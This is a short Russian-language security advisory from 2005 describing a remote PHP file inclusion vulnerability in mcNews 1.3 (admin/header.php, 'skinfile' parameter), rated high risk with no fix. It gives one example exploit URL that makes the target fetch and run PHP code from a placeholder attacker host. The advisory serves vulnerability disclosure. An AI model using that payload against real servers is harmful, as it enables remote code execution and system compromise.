Security Lab

PHP-инклюдинг в mcNews

Дата публикации:09.03.2005
Всего просмотров:1437
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-0720
CVE-2005-0800
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: mcNews 1.x
Уязвимые версии: mcNews 1.3

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует в сценарии 'mcNews/admin/header.php' из-за недостаточной фильтрации входных данных в переменной skinfile. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе. Пример:

http://[target]/[dir]/mcNews/admin/header.php?skinfile=http://[attacker]/

URL производителя: http://www.phpforums.net/index.php?dir=dld

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: mcNews 'header.php' Include File Flaw Lets Remote Users Execute Arbitrary Commands